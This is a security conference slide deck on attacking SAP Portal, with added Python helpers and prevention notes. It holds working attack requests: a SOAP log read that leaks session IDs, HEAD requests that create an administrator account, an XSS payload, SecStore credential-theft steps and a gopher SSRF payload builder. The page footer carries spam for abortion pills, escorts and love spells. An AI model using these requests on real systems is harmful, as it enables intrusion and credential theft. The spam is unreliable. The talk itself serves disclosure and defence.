Invest in security to secure investments

Breaking SAP Portal

Alexander Polyakov
CTO, ERPScan
About ERPScan

• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
Agenda

• Say hello to SAP Portal
• Breaking Portal through SAP services
• Breaking Portal through the J2EE Engine
• Breaking Portal through Portal issues
• ERPScan SAP Pentesting Tool: password decrypt module
• Conclusion
SAP

• The most popular business application
• More than 180000 customers worldwide
• 74% of Forbes 500 run SAP
Meet sapscan.com

http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
Say hello to Portal

• Point of web access to SAP systems
• Point of web access to other corporate systems
• Way for attackers to get access to SAP from the Internet
• ~17 Portals in Switzerland, according to Shodan
• ~11 Portals in Switzerland, according to Google
EP architecture

[Diagram: Enterprise Portal architecture]
Okay, okay. SAP Portal is important, and it has many links to other modules. So what?
SAP Management Console

• SAP MC provides a common framework for centralized system management
• It allows viewing the trace and log messages
• Using a JSESSIONID taken from the logs, an attacker can log into Portal

What can we find in the logs?
Right! The file userinterface.log contains the calculated JSESSIONID.

But... the attacker must have credentials to read the log file!

Wrong!
SAP Management Console

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%COUNT%</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Prevention

Don't use TRACE_LEVEL = 3 in production systems, or delete the traces.

http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
Single Sign-On

SSO (old but still works)

• SAP implements SSO using the Header Variable Login Module

[Diagram: the user presents credentials, the check returns "okay" and a cookie is issued; the attacker skips the check by sending the header_auth header directly to the J2EE Engine and receives a cookie]

tnx Mariano ;)
Prevention

• Implement proper network filters to avoid direct connections to SAP
• J2EE Engine: if you use it for Windows authentication, switch to SPNegoLoginModule

http://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/a3d940c2653126e10000000a1550b0/frameset.htm
SAP NetWeaver J2EE

Access control

Web Dynpro     - programmatic
Portal iViews  - programmatic
J2EE Web apps  - declarative

Programmatic: by UME
Declarative:  by WEB.XML
Declarative access control

• The central entity in the J2EE authorization model is the security role.
• Programmers define the application-specific roles in the J2EE deployment descriptors: web.xml and web-j2ee-engine.xml
Verb Tampering

web.xml

<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
Verb Tampering

• If we try to access the application using GET, we need a login:password and the administrator role
• What if we try to access the application using HEAD instead of GET?
• PROFIT!
• Did you know about ctc?
Verb Tampering

Need an admin account in SAP Portal? Just send two HEAD requests.

• Create new user blabla:blabla

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla

• Add user blabla to group Administrators

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=blabla,GROUPNAME=Administrators

Works when UME uses the JAVA database
Prevention

• Install SAP notes 1503579, 1616259
• Install the other SAP notes about Verb Tampering
• Scan applications with the ERPScan WEB.XML checker
• Disable the applications that are not necessary
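What a WEB.XML checker for this class of bug has to look for, as an added example (my own code, not the ERPScan checker and not from the slides): a <security-constraint> that lists <http-method> elements protects only those verbs, so every other verb (HEAD here, but also PUT, DELETE or an invented method name) reaches the servlet without the role check. The scanner reports each verb-limited collection and produces the hardened descriptor by dropping the <http-method> elements so the constraint covers every verb. The sample descriptor is the slide's web.xml, constructed inline; real descriptors carry the javaee namespace, which the tag helper strips.

```python
"""
Added example (not from the slides, not the ERPScan checker): scan web.xml for
verb-limited security constraints and emit a hardened copy. Servlet 3.0's
<http-method-omission> inverts the meaning and is not handled here.
"""
import xml.etree.ElementTree as ET

KNOWN_METHODS = ("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE")

# The slide's descriptor, constructed inline as the scanner's input.
VULNERABLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""


def _tag(elem) -> str:
    """Local name without the javaee namespace that real descriptors carry."""
    return elem.tag.rsplit("}", 1)[-1]


def find_verb_tampering(web_xml: str) -> list:
    """One finding per web-resource-collection whose constraint names specific verbs."""
    root = ET.fromstring(web_xml)
    findings = []
    for constraint in [e for e in root.iter() if _tag(e) == "security-constraint"]:
        roles = [r.text.strip() for r in constraint.iter()
                 if _tag(r) == "role-name" and r.text]
        for coll in [c for c in constraint if _tag(c) == "web-resource-collection"]:
            patterns = [p.text.strip() for p in coll if _tag(p) == "url-pattern" and p.text]
            listed = {m.text.strip().upper() for m in coll
                      if _tag(m) == "http-method" and m.text}
            if not listed:
                continue  # no <http-method>: the constraint already covers every verb
            findings.append({
                "patterns": patterns,
                "roles": roles,
                "constrained": sorted(listed),
                # any verb outside "listed", known or invented, bypasses the role check
                "unconstrained": sorted(set(KNOWN_METHODS) - listed),
            })
    return findings


def remove_http_methods(web_xml: str) -> str:
    """Hardened descriptor: drop every <http-method> so the constraint applies to all verbs."""
    root = ET.fromstring(web_xml)
    for coll in [c for c in root.iter() if _tag(c) == "web-resource-collection"]:
        for method in [m for m in coll if _tag(m) == "http-method"]:
            coll.remove(method)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for f in find_verb_tampering(VULNERABLE_WEB_XML):
        print(f"{f['patterns']} limited to {f['roles']} only for {f['constrained']}; "
              f"{f['unconstrained']} bypass the check")
    print("after hardening:", find_verb_tampering(remove_http_methods(VULNERABLE_WEB_XML)))
```

Run it over every web.xml under the engine's deploy directory; a clean result means no constraint is verb-limited, it does not mean the servlet itself rejects unexpected verbs, so the SAP notes above are still required.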
  
Invoker servlet

web.xml

<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>HEAD</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>

GET /admin/critical/CriticalAction
GET /servlet/com.sap.admin.Critical.Action
Invoker Servlet

• Want to execute an OS command on the J2EE server remotely?
• Maybe upload a backdoor in a Java class?
• Or sniff all traffic?

Still remember ctc?
Prevention

• Update to the latest patches: SAP notes 1467771, 1445998
• "EnableInvokerServletGlobally" must be "false"
• Check all WEB.XML files with the ERPScan WEB.XML checker
So, where is Portal?
SAP Portal

• User access rights to objects are kept in the Portal Content Directory (PCD)
• Based on ACLs
• 2 types of access:
  – design time: for administrators
  – runtime: for users

Portal Permission Levels

[Diagram: Portal permission levels]
End User permission

Objects where end user permission is enabled affect the following areas in Portal:
  – all Portal Catalog objects with end user permission
  – authorized Portal users may access restricted Portal components by URL, without an intermediate iView, if they are granted permission in the appropriate security zone
Administrator permission

• Owner = full control + modify permissions
• Full control = read/write + delete object
• Read/Write = read + write + edit properties + add/remove child
• Write (folders only) = create objects
• Read = view object + create instances (delta links and copies)
• None = access not granted
Role Assigner permission

• The Role Assigner permission setting is available for role objects
• It allows you to determine which Portal users are permitted to assign other users, groups, or roles to the role principal using the Role Assignment tool
Security Zones

• Security zones allow the system administrator to control which Portal components and Portal services a Portal user can launch
• A security zone specifies the vendor ID, the security area, and the safety level for each Portal component and Portal service
• The security zone is defined in a Portal application descriptor XML file
• A Portal component or service can only belong to one security zone; however, Portal components and services may share the same safety level
• Zones allow the administrator to assign permissions to a safety level instead of assigning them directly to each Portal component or service

Why? To group multiple iViews easily
We can get access to Portal iViews using a direct URL:

/irj/servlet/prt/portal/prtroot/<iView_ID>

And only the Security Zone rights will be checked
Security Zones

• So, SecZones offer an extra, but optional, layer of code-level security for iViews
  – User -> check "end user" permission on the role -> view iView
  – User -> check "end user" permission on the role -> check "end user" permission on the SecZone -> view iView

By default, this functionality is disabled
So I wonder how many Portal applications with No/Low Safety exist?
Safety Levels for Security Zones

• No Safety
  – Anonymous users are permitted to access portal components defined in the security zone.
• Low Safety
  – A user must be at least an authenticated portal user to access portal components defined in the security zone.
• Medium Safety
  – A user must be assigned to a particular portal role that is authorized to access portal components defined in the security zone.
• High Safety
  – A user must be assigned to a portal role with higher administrative rights that is authorized to access portal components defined in the security zone.
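One way to answer the question on the previous slide for your own landscape, as an added example that is not from the slides: walk the Portal application descriptors, read each component's security zone, map the safety level to the weakest principal the four rules above allow, and list the direct prtroot URLs that need no role at all. Assumptions not spelled out on the slides: the descriptor shape (portalapp.xml with a <component> whose <component-config> carries a "SecurityZone" property whose last segment is the safety level) and the direct URL form /irj/servlet/prt/portal/prtroot/<application>.<component>; the descriptors themselves are constructed.

```python
"""
Added example (not from the slides): inventory security zones in Portal application
descriptors and list components reachable without any role assignment.

Assumptions: descriptor layout and the <application>.<component> URL form follow the
usual portalapp.xml convention; DESCRIPTORS below are constructed.
"""
import xml.etree.ElementTree as ET

# Safety level -> weakest principal that may launch components in the zone
# (the four rules from the "Safety Levels" slide).
WEAKEST_PRINCIPAL = {
    "no_safety": "anonymous",
    "low_safety": "any authenticated user",
    "medium_safety": "member of an authorized role",
    "high_safety": "member of an authorized administrative role",
}
PRTROOT = "/irj/servlet/prt/portal/prtroot/"

DESCRIPTORS = {
    "com.example.selfservice": """<application>
  <components>
    <component name="PayslipView">
      <component-config>
        <property name="ClassName" value="com.example.PayslipView"/>
        <property name="SecurityZone" value="com.example/Selfservice/low_safety"/>
      </component-config>
    </component>
    <component name="PublicNews">
      <component-config>
        <property name="ClassName" value="com.example.PublicNews"/>
        <property name="SecurityZone" value="com.example/Public/no_safety"/>
      </component-config>
    </component>
  </components>
</application>""",
    "com.example.admin": """<application>
  <components>
    <component name="UserAdmin">
      <component-config>
        <property name="ClassName" value="com.example.UserAdmin"/>
        <property name="SecurityZone" value="com.example/Admin/high_safety"/>
      </component-config>
    </component>
    <component name="Forgotten">
      <component-config>
        <property name="ClassName" value="com.example.Forgotten"/>
      </component-config>
    </component>
  </components>
</application>""",
}


def safety_level(zone: str) -> str:
    """Pick the safety-level segment out of vendor/area/level; none -> 'unspecified'."""
    for part in zone.split("/"):
        if part in WEAKEST_PRINCIPAL:
            return part
    return "unspecified"


def components_in_app(app_name: str, descriptor_xml: str) -> list:
    """(direct URL, safety level) for every component declared in one descriptor."""
    root = ET.fromstring(descriptor_xml)
    result = []
    for comp in root.iter("component"):
        zone = ""
        for prop in comp.iter("property"):
            if prop.get("name") == "SecurityZone":
                zone = prop.get("value", "")
        result.append((PRTROOT + app_name + "." + comp.get("name"), safety_level(zone)))
    return result


def weakly_zoned(descriptors: dict) -> list:
    """Direct URLs that need no role: no_safety, low_safety, or no zone declared at all."""
    weak = []
    for app, xml_text in descriptors.items():
        for url, level in components_in_app(app, xml_text):
            if level in ("no_safety", "low_safety", "unspecified"):
                who = WEAKEST_PRINCIPAL.get(
                    level, "no SecurityZone declared: check which default zone applies")
                weak.append((url, level, who))
    return weak


if __name__ == "__main__":
    for url, level, who in weakly_zoned(DESCRIPTORS):
        print(f"{url}  [{level}]  launchable by: {who}")
```

Components with no zone at all are listed on purpose: whatever default the engine applies, they were never reviewed, and that is where the custom "low security level" applications of the next slide tend to come from.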
  
No safety zone

Many custom applications with a low security level zone
Prevention

Check security zone permissions

• http://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm
• http://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b84200047582c9f7/frameset.htm
SAP Portal

• Web based services
• All of the OWASP TOP10 is relevant
  – XSS
  – Phishing
  – Traversal
  – XXE
  – …
EPCF XSS

• Many XSSs in Portal
• But sometimes the cookies are "httponly"
• But when we exploit XSS, we can use the features of SAP Portal
<SCRIPT>
  alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
</SCRIPT>
EPCF

EPCF provides a JavaScript API designed for client-side communication between portal components and the portal core framework

• Enterprise Portal Client Manager (EPCM)
• iViews can access the EPCM object from every portal page or IFrame
• Every iView contains the EPCM object
• For example, EPCF is used as a transient user data buffer for iViews
Prevention

Install SAP note 1656549
KM Phishing

SAP Knowledge Management may be used to create phishing pages
FIX

Directory traversal

Directory traversal fix bypass

Prevention

Install SAP note 1630293
Cut the Crap, Show Me the Hack

Breaking SAP Portal

• Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
• Found a file in the OS of SAP Portal with the keys to decrypt the passwords
• Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
• Decrypt the passwords and log into Portal
• PROFIT!
Read file

How can we read the file?
  – Directory Traversal
  – OS command execution
  – XML External Entity (XXE)

XXE in Portal

XXE: Error based XXE
Breaking SAP Portal

• Ok, we can read files
• Where are the passwords?
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:

\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
Where are the passwords? (config.properties)

rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
But where is the key?

SecStore.properties

$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrz€eUA+bw4XCzdz16zX78u•t
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
Get the password

• We have an encrypted password
• We have a key to decrypt it

We got the J2EE admin and JDBC login:password!
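The file-reading half of the chain above, as an added example that is not from the slides or from the ERPScan tool: given an arbitrary-file-read primitive (traversal, XXE, command execution), read config.properties first, take the secure-store and key-file paths from it, then read the store and see which credentials it holds for which system. The two inputs are the slide listings, re-typed here as constructed strings (the binary-looking $internal/check line is left out). The .properties parser is hand-written so the block runs offline; decrypting the values is out of scope, because the slides do not document the SecStore format.

```python
"""
Added example (not from the slides): locate the SAP secure store and its key file from
config.properties and inventory the credential entries in SecStore.properties.
Inputs are the slide listings, constructed here as strings; no decryption is done.
"""
import re

CONFIG_PROPERTIES = """\
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
"""

SECSTORE_PROPERTIES = """\
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
"""

_SEP = re.compile(r"(?<!\\)[=:]")  # first unescaped '=' or ':' separates key and value


def parse_properties(text: str) -> dict:
    """Minimal java.util.Properties reader: comments, key=value or key:value, '\\' continuation."""
    props, pending = {}, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line[0] in "#!":
            continue
        if line.endswith("\\") and not line.endswith("\\\\"):   # approximate continuation rule
            pending = line[:-1]
            continue
        m = _SEP.search(line)
        key, value = (line[:m.start()], line[m.end():]) if m else (line, "")
        props[key.strip()] = value.strip()
    return props


def secstore_files(config_text: str) -> dict:
    """The two paths to read next: the encrypted store and the key that unlocks it."""
    cfg = parse_properties(config_text)
    return {"secfile": cfg.get("secstorefs.secfile"),
            "keyfile": cfg.get("secstorefs.keyfile"),
            "system": cfg.get("system.name")}


def credential_entries(secstore_text: str) -> dict:
    """Group admin/* and jdbc/* entries by system ID and report whether values are encrypted."""
    store = parse_properties(secstore_text)
    systems = {}
    for key, value in store.items():
        if key.startswith("$internal/"):
            continue
        parts = key.split("/")                  # e.g. admin/password/TTT -> ("admin/password", "TTT")
        systems.setdefault(parts[-1], {})["/".join(parts[:-1])] = value
    return {"encrypted": store.get("$internal/mode") == "encrypted", "systems": systems}


if __name__ == "__main__":
    print(secstore_files(CONFIG_PROPERTIES))
    info = credential_entries(SECSTORE_PROPERTIES)
    for sid, entries in info["systems"].items():
        print(sid, sorted(entries), "encrypted" if info["encrypted"] else "plaintext")
```

The defensive reading is the same inventory: every entry listed for a system is a credential whose confidentiality rests entirely on the OS permissions of SecStore.key, which is why the next slide's fix is file access, not only a patch.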
  
Prevention

• Install SAP note 1619539
• Restrict read access to the files SecStore.properties and SecStore.key
Portal post exploitation

• Lots of links to other systems in the corporate LAN
• Using SSRF, attackers can get access to these systems

What is SSRF?
SSRF History: Basics

• We send Packet A to Service A
• Service A initiates Packet B to Service B
• Services can be on the same or different hosts
• We can manipulate some fields of Packet B from within Packet A
• Various SSRF attacks depend on how many fields of Packet B we can control

[Diagram: Packet A -> Service A -> Packet B -> Service B]
Partial Remote SSRF: HTTP attacks on other services

[Diagram: a direct attack (GET /vuln.jsp) against an HTTP server inside the corporate network, versus an SSRF attack relayed through host A, which issues GET /vuln.jsp to host B]
Gopher URI scheme

• Using the gopher:// URI scheme, it is possible to send arbitrary TCP packets
  – Exploit OS vulnerabilities
  – Exploit old SAP application vulnerabilities
  – Bypass SAP security restrictions
  – Exploit vulnerabilities in local services

More info in our BH2012 presentation: SSRF vs. Business Critical Applications
http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
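The mechanics behind the "Packet A controls Packet B" slides and the gopher:// bullet above, as an added example that is not from the slides or the whitepaper: a raw TCP payload is percent-encoded into a gopher URL, a gopher client strips the one-character item type after the slash and writes the rest to the socket, so the bytes arrive at the internal host unchanged. The decoder shows what the target would receive. Hosts and payload are constructed; whether a given SAP fetcher honours gopher:// has to be confirmed per system, the slides only state that the scheme lets you send TCP packets.

```python
"""
Added example (not from the slides): build a gopher:// URL that delivers a raw TCP
payload through an SSRF-able fetcher, and decode such a URL back for inspection.
Hosts and payload are constructed.
"""
from urllib.parse import quote_from_bytes, unquote_to_bytes, urlsplit


def gopher_url(host: str, port: int, payload: bytes) -> str:
    """
    A gopher client sends everything after the one-character item type as the
    selector, followed by CRLF. '_' is a throw-away type character, so the bytes after
    it reach the socket unchanged; every byte is percent-encoded to survive URL parsing.
    """
    return f"gopher://{host}:{port}/_{quote_from_bytes(payload, safe='')}"


def gopher_payload(url: str) -> tuple:
    """Inverse of gopher_url: (host, port, bytes the target socket would receive)."""
    parts = urlsplit(url)
    if parts.scheme != "gopher" or not parts.path.startswith("/_"):
        raise ValueError("not a gopher URL built by gopher_url")
    return parts.hostname, parts.port, unquote_to_bytes(parts.path[2:])


def http_probe(host: str, path: str) -> bytes:
    """Packet B: the HTTP/1.0 request the intermediary (service A) relays to service B."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


if __name__ == "__main__":
    # Packet A carries this URL in whatever parameter the vulnerable service fetches.
    payload = http_probe("intranet.example", "/vuln.jsp")
    url = gopher_url("10.0.0.7", 8080, payload)
    print(url)
    print(gopher_payload(url))
```

The same builder works for any line-oriented protocol behind the Portal, which is the point of the bullets above: once the fetcher speaks gopher, "partial" control over Packet B becomes full control of its bytes.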
  
Portal post-exploitation

[Diagram: post-exploitation from Portal into connected systems]
Conclusion

It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.

It's all in your hands:
• SAP guides
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of duties
Future work

Many of the researched issues cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for the cooperation. However, if you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:

• November 9 – POC (Korea, Seoul)
• November 20 – ZeroNights (Russia, Moscow)
• November 29 – DeepSEC (Austria, Vienna)
 
	
  
Web:     www.erpscan.com
e-mail:  info@erpscan.com
Twitter: @erpscan
         @_chipik

Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP security
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 

Kürzlich hochgeladen

%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
masabamasaba
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 

Kürzlich hochgeladen (20)

MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
tonesoftg
tonesoftgtonesoftg
tonesoftg
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
